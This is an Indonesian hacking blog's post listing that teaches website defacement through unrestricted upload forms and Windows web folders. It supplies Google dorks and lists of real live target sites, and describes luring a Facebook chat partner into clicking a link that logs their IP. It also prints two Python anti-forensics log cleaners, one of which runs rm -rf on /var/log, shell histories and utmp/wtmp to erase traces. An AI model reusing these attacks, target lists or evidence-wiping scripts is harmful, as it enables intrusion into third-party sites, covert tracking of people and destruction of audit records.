SUCCESS..! you cAn hacked a web site from mobile phone.

Hasilnya seperti ini http://fril.co.il/portals/0/xadal.txt < 100% lewat handphone

Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab.
-sekian-

Posted by Grey | Shinji Kagawa

Thursday, March 8, 2012



[POC] Vulnerability Simplicity Of Upload

by:    No comments     
categories: 

Sesuai judul di atas, mari kita bahas bersama aja :)

Simplycity Of Upload, terdengar sangat hebat bukan ? haha.

Mendapatkan ini selal tidak sengaja, karena saya hanya memakai dork yang lumanyun.

#Step 1:
Dork: “Powered By: © Simplicity oF Upload”

#Step 2:
Exploit: http://[situstargetkamu]/PATH/upload.php
*Tergantung dengan target.

#Step 3:
Allowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html)

#Step 4:
Preview: http://[situstargetkamu]/upload/[Your File]

#Step 5: Live Demo:
http://www.railfaneurope.net/pix/upload.php
http://www.formplas.com/upload/upload.php

*Di google masih banyak kok :D

Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya.
Kalau masih ada yang bingung ? komen aja, nanti langsung saya bales :)
Keep spirit brothers.



Coppermine Photo Gallery – Upload Vulnerability

by:    No comments     
categories: 

Assalamualaikum sahabat 6654, kangen gak dengan saya ? Sudah lama nih gak update, karena sibuk di sekolah jadi lupa segalanya, lupa pacar, lupa makan dll haha :)

Okay deh, tanpa panjang lebar, kita mau ngebahas deface lagi aja, kalau masih ada yang minat deface ? Baca aja nih article saya :D

Yups langsung aja.
Kita pakai google dork: “Powered by Coppermine Photo Gallery”

A: Memang apa sihPowered by Coppermine Photo Galleryitu ?? seperti apakah itu.
B: Pertanyaan yang bagus sekali .

“Itu merupakan penyedia jasa hosting gratis tanpa bayar lagi, jadi kalau kita mau upload file kita, bisa di situ, tanpa harus registrasi dahulu.”

A: Nah bagaimana cara menemukan nya ?
B: Baik saya akan berikan kok.

  1. kita tulis di google dengan kata kunci “Powered by Coppermine Photo Gallery” (jangan lupa pakai tanda petik)
  2. Pilih salah satu menurut anda yang bisa di pakai.
  3. Akan ada gambar seperti ini.
Kalau sudah ketemu gambar seperti itu, langkah seterus nya mudah kok, Tinggal pilih file yang mau kalian upload.

Jika kalian sudah berhasil mengupload file nya ? Selanjut nya cari file anda.

Sebagai referensi lain bisa ke artikel ini: http://www.binushacker.net/cara-deface-website-dengan-file-upload.html

POC nya: http://[localhost]/Patch/upload.php

Live Target:
http://www.bergthaller.eu/coppermine/cpg146/upload.php
http://www.manat.no/bilder/upload.php

Preview File:
Kalian bisa melihat, jika sukses upload file :D

Ekstensi File:
jpg, xlx, txt, bmp, doc, mp4, etc —> gak support untuk: html, asp, php

Nah cuma segitu aja kok, gampang kan ?
Mudah sekali itu, selanjutnya tinggal kalian kembangin sendiri :)

Okay good luck ya ^_^

Sunday, March 4, 2012



Cara Deface Website Dengan Web Folder

by:    No comments     
categories: 
Kita mungkin pernah melihat halaman yang terkena aksi jahil terhadap situs tertentu oleh para defacer.
Lalu di dalam hati akan bertanya-tanya bagaimana cara melakukan itu??.
Mungkin kamu pernah membaca artikel tentang cara men-deface website dengan menggunakan teknik XSS, SQLi, LFI, RFI dll.
Namun percayalah, selain teknik tersebut masih ada teknik lain yang jauh lebih sederhana semudah copy paste file.

[Image: ofani.JPG]

Bagaimana caranya??, yaitu dengan menggunakan web folder yang disediakan oleh OS Windows sendiri.
Namun perlu diketahui, teknik ini hanya berlaku untuk website yang menggunakan OS Windows dan server IIS 5.0/6.0 .

Lalu bagaimana cara mengetahui bahwa target kita menggunakan server IIS?
Mudah saja, silakan buka netcraft.com dan masukkan target kita ke textbox yang tersedia, maka akan kita dapatkan informasi website tersebut, termasuk OS dan server yang digunakan.
Jika kamu ingin mendapatkan target secara acak bisa menggunakan google dork dengan menggunakan keyword allinurl:*.asp , allinurl:*.aspx dan sebagainya.dan sebagainya.[/color]

OK, langsung kita mulai saja tutorialnya.

1. Buka My Computer lalu lihat icon web folder, lalu klik 2x icon web folder tersebut (Win 98/ME/2000).
Jika kamu menggunakan windows XP secara default tidak akan menemukan folder tersebut di My Computer, tapi kamu bisa membuat secara manual dengan membuat shortcut baru.

Berikut langkahnya :
- Klik kanan pada desktop, kemudian pilih New -> Shortcut .
- Maka akan ada popup yang meminta untuk memasukkan lokasi tujuan, lalu kamu masukkan alamat dibawah ini :
[/color]%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

- Jika sudah silakan klik Next -> Next -> Finish.
- Jika shortcut nya sudah terbentuk, lalu klik 2x pada shortcut tersebut.
[Image: ofani2.jpg]
2. Jika kamu sudah berhasil membuka web folder tersebut kemudian klik kanan lalu pilih New – Web Folder
[Image: ofani3.jpg]
3. Lalu akan muncul popup yang meminta untuk memasukkan alamat tujuan. Sebagai contoh kamu masukkan http://www.aslty.com.cn sebagai target.
[Image: ofani4.jpg]
4. Kemudian klik Next dan tunggu sampai prosesnya selesai, lama tidaknya proses tergantung koneksi internetmu.

5. Buka folder yang sudah terbentuk, nama folder biasanya mengambil dari nama domain, jika domainnya adalah http://www.aslty.com.cn , maka nama foldernya juga http://www.aslty.com.cn.[Image: ofani5.jpg]
6. Copy paste sebuah file html ke dalam web folder yang telah kamu buat ke folder http://www.aslty.com.cn.

7. Jika proses copy paste selesai, sebagai contoh jika nama file kamu adalah “Raja_T3g4.htm” maka cara melihatnya adalah dengan membuka browser dan mengetikkan alamat http://www.g8888.com/hacked.html
[Image: Hacked.PNG]
Nie ane kasih kumpulan websitenya biar mudah :

zgsfjw.net
centro.anje.pt
http://www.ziangli.com
6.shicheng.gov.cn
http://www.ville-mordelles.fr
http://www.podiocom.com
http://www.journeezerotracas.fr
http://www.journeezerotracas.com
http://www.journee0tracas.com
http://www.comune.torrice.fr.it
http://www.chinamaster88.com
http://www.chateaudelepinay.fr
http://www.centroformazioneitalia.it
http://www.bjautoobd.com
http://www.autodiagtool.com
usa.automotormaster.com
so-sighty.fr
perros-guirec.icor.fr
myhealthcity.com
malaysiahealthcareindonesia.com
lapetitehublais.fr
handistar.fr
gz.autoobd-ii.com
gz.automotormaster.com
expert-comptable-35.fr
carrelages-palmieri.com
camion-road-show.com
autoobd.cn
hibis.co.id
http://www.zjgsxy.com


Kalau mau dapet website lebih lainnya bisa di dork di google :

inurl:.ah.cn/*.asp
inurl:.bj.cn/*.asp
inurl:.cq.cn/*.asp
inurl:.fj.cn/*.asp
inurl:.gd.cn/*.asp
inurl:.gs.cn/*.asp
inurl:.gz.cn/*.asp
inurl:.gx.cn/*.asp
inurl:.ha.cn/*.asp
inurl:.hb.cn/*.asp
inurl:.he.cn/*.asp
inurl:.hi.cn/*.asp
inurl:.hl.cn/*.asp
inurl:.hn.cn/*.asp
inurl:.jl.cn/*.asp
inurl:.js.cn/*.asp
inurl:.jx.cn/*.asp
inurl:.ln.cn/*.asp
inurl:.nm.cn/*.asp
inurl:.nx.cn/*.asp
inurl:.qh.cn/*.asp
inurl:.sc.cn/*.asp
inurl:.sd.cn/*.asp
inurl:.sh.cn/*.asp
inurl:.sn.cn/*.asp
inurl:.sx.cn/*.asp
inurl:.tj.cn/*.asp
inurl:.tw.cn/*.asp
inurl:.xj.cn/*.asp
inurl:.xz.cn/*.asp
inurl:.yn.cn/*.asp
inurl:.zj.cn/*.asp
inurl:.ac.cn/*.asp
inurl:.com.cn/*.asp
inurl:.edu.cn/*.asp
inurl:.gov.cn/*.asp
inurl:.net.cn/*.asp
inurl:.org.cn/*.asp


Catatan : Saya mempraktekan metode ini dengan windows XP, dan setelah di coba ternyata bisa di gunakan di semua Windows XP.
Saran saya adalah , Gunakan ilmu yang anda peroleh untuk kebaikan , karena baik dan buruknya tergantung dari pribadi masing masing.


Don't Learn to Hack, but Hack to Learn

Mungkin segini dulu bro, selebihnya akan saya tambahkan lain waktu ☻semoga bermanfaat.

Saturday, March 3, 2012



Cara Mengetahui IP Lawan via Chatting Facebook

by:    No comments     
categories: 

Silakan disimak tutorial ini, untuk mengetahui IP publik teman chatting anda :)

Kalau ada pertanyaangabung langsung ke group binushacker disini: https://www.facebook.com/groups/binushacker/

Tutorial ini digunakan untuk mengetahui IP lawan dengan cara chat di FaceBook.
Hal ini bermanfaat untuk mengidentifikasi lawan melalui media Social Engineering.

Cara Mengetahui IP Lawan

Ada beberapa yang perlu disiapkan yaitu:

  1. Sebuah SERVER HOSTING yang bisa dipakai untuk menyimpan file logger.
  2. Sebuah LINK content / halaman menarik yang dapat digunakan untuk mengalihkan perhatian lawan.
  3. FILE LOGGER itu sendiri.

Instalasi FILE LOGGER kedalam CONTENT:

  1. Bikin sebuah artikel yang indah & menarik, sehingga akan banyak orang yang akan melihat.
  2. Kemudian buatlah file HTML, misalkan simpan difile: “galau.html“.
  3. Pada sela-sela code html tersebut, masukkanlah / inject code logger kedalam source htmlnya.
  4. Sesuaikan / edit alamat email untuk pengiriman hasil IP target di dalam code loggernya.
  5. Kemudian upload file tersebut ke server hosting.
  6. Pastikan serverhosting memiliki kemampuan pengiriman email seperti: SMTP / POP3
  7. Nanti file tersebut dibuka dengan: http://www.situsanda.com/galau.html

Cara yang dipakai disini adalah:

  1. Berusaha chatting dengan lembut dan baik dengan lawan chatting kita.
  2. Kemudian rayulah lawan untuk dapat meng-klik LINK yang sudah kita berikan tadi.
  3. Konfirmasikan ke lawan apakah sudah membaca link dengan cara menanyakan apa isi linknya.
  4. Link yang anda kirimkan adalah link logger yang tadi yaitu http://www.situsanda.com/galau.html

Setelah dapat dipastikan bahwa lawan kita sudah melihat link tersebut.

Maka, jreeengggggg.. kita lihat hasilnya. Itulah dia IP lawan chatting kita di Facebook.

Untul lebih jelas detailnya silakan ditonton disini:

File yang dibutuhkan, silakan download disini:

Selamat mencoba & semoga berhasil :)

Friday, March 2, 2012



Tampilkan Hidden File & Folder

by:    No comments     
categories: 

Tampilkan Hidden File & Folder

31 December 2011
Penulis: · Kategori Artikel: Virus

BINUS HACKER Binus Hacker Is Not Criminal Banner



12
1
13
share

Pernah file dan/atau folder-folder kamu hilang karena komputer terserang virus? Tenang…! Tidak perlu panik dulu. Tulisan kali ini akan membahas tutorial bagaimana mengembalikan file dan folder yang “hilang” (sebenarnya hanya ter-hidden alias disembunyikan) oleh virus pada windows. Meski kasus ini sudah lama ada, virus-virus baru masih saja hobi mengulangi kasus meng-hidden file seperti ini.

Tampilkan Image File Folder

Perlu ditekankan bahwa file dan folder yang bisa dikembalikan menjadi normal adalah file atau folder yang “hanya” disembunyikan oleh virus. File dan folder yang benar-benar hilang atau terhapus tidak bisa dikembalikan lagi, kecuali menggunakan sistem restore.

Okeh, kita mulai tutorial bagaimana menampilkan kembali file dan folder yang di-hidden oleh virus:

1. Start > Run > Notepad
Copy Paste-kan :

Code:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
“ServerAdminUI”=dword:00000000
“Hidden”=dword:00000001
“ShowCompColor”=dword:00000001
“HideFileExt”=dword:00000001
“DontPrettyPath”=dword:00000000
“ShowInfoTip”=dword:00000001
“HideIcons”=dword:00000000
“MapNetDrvBtn”=dword:00000000
“WebView”=dword:00000001
“Filter”=dword:00000000
“SuperHidden”=dword:00000001
“SeparateProcess”=dword:00000000
“ListviewAlphaSelect”=dword:00000001
“ListviewShadow”=dword:00000001
“ListviewWatermark”=dword:00000001
“TaskbarAnimations”=dword:00000001
“StartMenuInit”=dword:00000002
“StartButtonBalloonTip”=dword:00000002
“TaskbarSizeMove”=dword:00000000
“TaskbarGlomming”=dword:00000000
“NoNetCrawling”=dword:00000000
“FolderContentsInfoTip”=dword:00000001
“FriendlyTree”=dword:00000001
“WebViewBarricade”=dword:00000000
“DisableThumbnailCache”=dword:00000000
“ShowSuperHidden”=dword:00000001
“ClassicViewState”=dword:00000000
“PersistBrowsers”=dword:00000000
“Start_LargeMFUIcons”=dword:00000001
“Start_MinMFU”=dword:00000006

Save file dgn nama : showhiddenfiles.reg ( save dimana saja )

2. Start > Run > Notepad
Copy Paste-kan :

Code:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN]
“RegPath”=”Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced”
“Text”=”@shell32.dll,-30501″
“Type”=”radio”
“CheckedValue”=dword:00000002
“ValueName”=”Hidden”
“DefaultValue”=dword:00000000
“HKeyRoot”=dword:80000001
“HelpID”=”shell.hlp#51104″

Save file dgn nama : nohidden.reg ( terserah mo di save dimana saja lg…heheh )

3. Start > Run > Notepad
Copy Paste-kan :

Code:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
“RegPath”=”Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced”
“Text”=”@shell32.dll,-30500″
“Type”=”radio”
“CheckedValue”=dword:00000001
“ValueName”=”Hidden”
“DefaultValue”=dword:00000002
“HKeyRoot”=dword:80000001
“HelpID”=”shell.hlp#51105″

Save file dgn nama : showall.reg ( terserah mo di save dimana sj lg….wkwkwk )

Setelah 3 file tersebut diatas jadi, klik satu persatu mulai dr no. 1 s/d 3 ( Pilih “Yes” )

NB : Simpan file ( .REG ) ini baik2, dan apabila suatu zaman nanti file & folder anda di-hidden lg oleh virus, anda dpt menggunakanx kembali….. Ok :)



Menambahkan Voice Transcription di Input Box

by:    No comments     
categories: 

Seperti yang anda semua tahu, HTML 5 merupakan versi terbaru dari bahasa HTML yang menambahkan berbagai macam tag-tag yang membuat website bisa jauh lebih interaktif tanpa memerlukan bantuan plugin seperti Flash, Silverlight atau Java (bukan JavaScript ya…).

Nah, salah satu dari HTML 5 ini adalah Voice Transcription. Sampai sekarang memang Voice Transcription ini masih hanya berfungsi pada browser Google Chrome. Mungkin Firefox, Opera, Internet Explorer serta Safari akan menyusul nanti…

Untuk membuatnya sebenarnya sangatlah mudah! Anda hanya perlu menambahkan sebuah tambahan pada tag . Jari-jemari ga perlu capek hanya untuk menulisnya karena hanya sedikit saja yang perlu ditambahkan…

Oke, daripada kebanyakan ngomong teori (sebagian besar orang bosen dengan teori) maka dari itu kita langsung lompat ke Prakteknya saja. Kita mulai dengan membuat form sederhana yang isinya adalah sebuah input box dan submit button.



Contoh HTML5 Voice Transcription


Voice Transcription







Hasilnya adalah seperti ini:

Yap! Cuma sekedar page dengan input box biasa ditambah submit button yang juga biasa (NB: Memang submit buttonnya tidak akan kita apa-apain. Yang kita ubah hanya input boxnya saja). Sekarang waktunya kita menambahkan Voice Transcription pada input boxnya. Mari kita ubah…

Waktunya fokus kembali pada script input boxnya:

Untuk menambahkan Voice Transcription maka kita harus menambahkan “x-webkit-speech” (tanpa tanda petik) ke tag input boxnya sehingga scriptnya menjadi seperti ini:

Sehingga secara keseluruhan scriptnya menjadi seperti ini:



Contoh HTML5 Voice Transcription


Voice Transcription



<input type=”input” name=”contohinput” x-webkit-speech/>



Nah, mari kita coba Save dan uji coba (lagi)

Sudah deh, nongol gambar Microphone di Input Boxnya. Coba klik Microphonenya dan katakanlah sesuatu (dalam Bahasa Inggris) dan lihat hasilnya… Mantap bukan?

Itu hanyalah contoh sederhana dari penggunaan Voice Transcription HTML5. Kita bisa mengembangkannya lagi menjadi sesuatu yang lebih baik seperti untuk situs dictionary, dsb. Pokoknya, tergantung imajinasi deh :)

Terima kasih sudah membaca artikel buatan saya… Maaf bila ada kata-kata yang salah mengingat ini artikel pertama saya di Hacker 6654 dan saya juga manusia yang pastinya pernah berbuat kesalahan.



Python Log Cleaner

by:    No comments     
categories: 

Share code untuk tools pembersih “log” dengan menggunakan phython, manfaatnya adalah anda bisa menghilangkan jejak sejenak dari log yang tersimpan.

Berikut ini codenya:

Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
#!/usr/bin/python
#PyLogcleaner uses the list given (logfiles) containing
# 274 logfiles and uses the linux find
#cmd to try and locate more logfiles to search
#for an ip address to replace with a random generated
#one. It can also encrypt/d3crypt a
#logfile and also can watch a logfile for modifications.
import os, sys, time, pwd, getopt, re, random, StringIO, commands
def title():
print "\n PyLogCleaner v1.0"
print "-----------------------------------------------"
def usage():
title()
print "\n Usage: python logcleaner.py
print "\t[options]"
print "\t -i : Ip to search for and replace"
print "\t -e : Encrypts logfile"
print "\t -d : Decrypts logfile"
print "\t -w/-watch
print "\t -h/-help: Prints this menu\n"
def timer():
now = time.localtime(time.time())
return time.asctime(now)
def validater(logs):
activeLogs = []
print "[+] Validating:",len(logs),"logfiles\n"
for l in logs:
if os.path.isfile(l) == True:
activeLogs.append(l)
if len(activeLogs)>0:
print "[+] Active Logs Found:",len(activeLogs)
return activeLogs
else:
print "[-] No Active Logs Found"
sys.exit(1)
def search(logfiles):
print "\n[+] Searching:",ip,"\n"
import mmap
for file in logfiles:
try:
f = open(file, "rb+")
size = os.path.getsize(file)
if size >= 1:
data = mmap.mmap(f.fileno(), size)
loc = data.find(ip)
#Lets not search a file with no data.
if loc == -1:
#print "[+] File:",file,"|",size,"bytes"
#print "\t[-] IP not found"
data.close()
else:
print "-"*45
print "[+] File:",file,"|",size,"bytes"
print "\t[+] IP found"
data.seek(loc)
data.write(randip)
print "[+] Replaced: ",ip,">>",randip
print "[+] New_Size:",os.path.getsize(file),"bytes"
print "-"*45
data.close()
except(IOError), msg:
pass
print "\n[+] Done:",timer(),"\n"
def findlogs():
os.chdir("/")
print "[+] Finding More Logfiles..."
#Lets use the linux find cmd to fing more files containing log...
logz = StringIO.StringIO(commands.getstatusoutput('find . -iname *log -perm -444 -print')[1]).readlines()
if len(logz)>0:
print "[+] Found:",len(logz),"extra logfiles"
for log in logz:
if re.search("Permission denied",log) == None:
logs.append(log[:-1])
return logs
def randip():
A = random.randrange(255) + 1
B = random.randrange(255) + 1
C = random.randrange(255) + 1
D = random.randrange(255) + 1
randip = "%d.%d.%d.%d" % (A,B,C,D)
return randip
def gettime():
clock = time.asctime(time.localtime(os.path.getmtime(logfile)))
return clock
def getsize():
size = os.path.getsize(logfile)
return size
def modlast(logfile):
try:
sys.argv[3]
except(IndexError):
print "\n[-] Need a time in seconds (ex: 60)\n"
sys.exit(1)
print "[+] Analyzing:",logfile
print "[+] Time:",sys.argv[3],"secs"
print "[+] Owner:",pwd.getpwuid(os.stat(logfile)[4])[0]
print "[+] Size:",getsize(),"bytes"
print "[+] Last Modified:",gettime()
print "[+] Starting:",timer()
old_time = gettime()
while True:
time.sleep(int(sys.argv[3]))
new_time = gettime()
if new_time != old_time:
print "\n[+] File Modified:",new_time
print "[+] New Size:",getsize(),"bytes\n"
old_time = new_time
def encrypter(file):
import base64
print "\n[+] Encrypting:",file
print "[+] Size:",os.path.getsize(file),"bytes"
try:
log2encode = open(file, "r").read()
except(IOError):
print "Error: Check your full path.\n"
sys.exit(1)
log2encode = base64.b64encode(log2encode)
os.remove(file)
time.sleep(2)
f = open(file, "a")
f.write(log2encode)
f.close()
print "[+] NewSize:",os.path.getsize(file),"bytes"
print "[+] Done\n"
def d3crypter(file):
import base64
print "\n[+] Decrypting:",file
print "[+] Size:",os.path.getsize(file),"bytes"
try:
b2log = open(file, "r").read()
except(IOError):
print "Error: Check your full path.\n"
sys.exit(1)
b2log = base64.b64decode(b2log)
os.remove(file)
time.sleep(2)
f = open(file, "a")
f.write(b2log)
f.close()
print "[+] NewSize:",os.path.getsize(file),"bytes"
print "[+] Done\n"
if len(sys.argv) <= 1:
usage()
sys.exit(1)
if len(sys.argv) == 2:
usage()
sys.exit(1)
if sys.argv[1] == "-w" or sys.argv[1] == "-watch":
logfile = sys.argv[2]
if os.path.isfile(logfile) == False:
title()
print "\n[-] Cannot Open File, Check Full Path!!!\n"
sys.exit(1)
else:
title()
modlast(logfile)
if sys.argv[1] == "-i":
ip = sys.argv[2]
try:
logs = open("logfiles", "r").readlines()
except(IOError):
print "Error: logfiles missing\n"
sys.exit(1)
title()
print "\n[+] Starting:",timer()
print "[+] Loaded:",len(logs),"logs"
findlogs()
randip = randip()
print "[+] Generate Random IP:",randip
search(validater(logs))
if sys.argv[1] == "-e":
file = sys.argv[2]
title()
encrypter(file)
if sys.argv[1] == "-d":
file = sys.argv[2]
title()
d3crypter(file)

Download Tools Disini:

Bisa juga menggunakan tools dari Vodork YCL berikut:

Code:

Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/bin/env python
import threading
import os
from time import sleep, ctime
print'''
_ _ ___ _
( ) ( )( _`\ ( )
`\`\_/'/'| ( (_)| |
`\ /' | | _ | | _
| | | (_( )| |_( )
(_) (____/'(____/'og cleaner
Kinds Regard
./VodOrkYCL.py
'''
lt = ctime()
print '[+] Starting log cleaner at %s\n\n' %(lt)
sleep(5)
class output_command(threading.Thread):
def __init__(self, command):
threading.Thread.__init__(self)
self.command = command
def run(self):
os.system(self.command)
print "[+]log was finish to clean......\n"
class input_command:
def __init__(self):
clear_add = ["rm -rf /tmp/logs","rm -rf $HISTFILE","rm -rf /root/.ksh_history","rm -rf /root/.bash_history","rm -rf /root/.bash_logout","rm -rf /usr/local/apache/logs","rm -rf /usr/local/apache/logs","rm -rf /usr/local/apache/log","rm -rf /var/apache/logs","rm -rf /var/apache/log","rm -rf /var/run/utmp","rm -rf /var/logs","rm -rf /var/log","rm -rf /var/adm","rm -rf /etc/wtmp","rm -rf /etc/utmp"]
for listt in clear_add:
try:
i=output_command(listt)
i.start()
except:
pass
if __name__ == "__main__":
objCaller = input_command()

Selamat mencoba, semoga berhasil!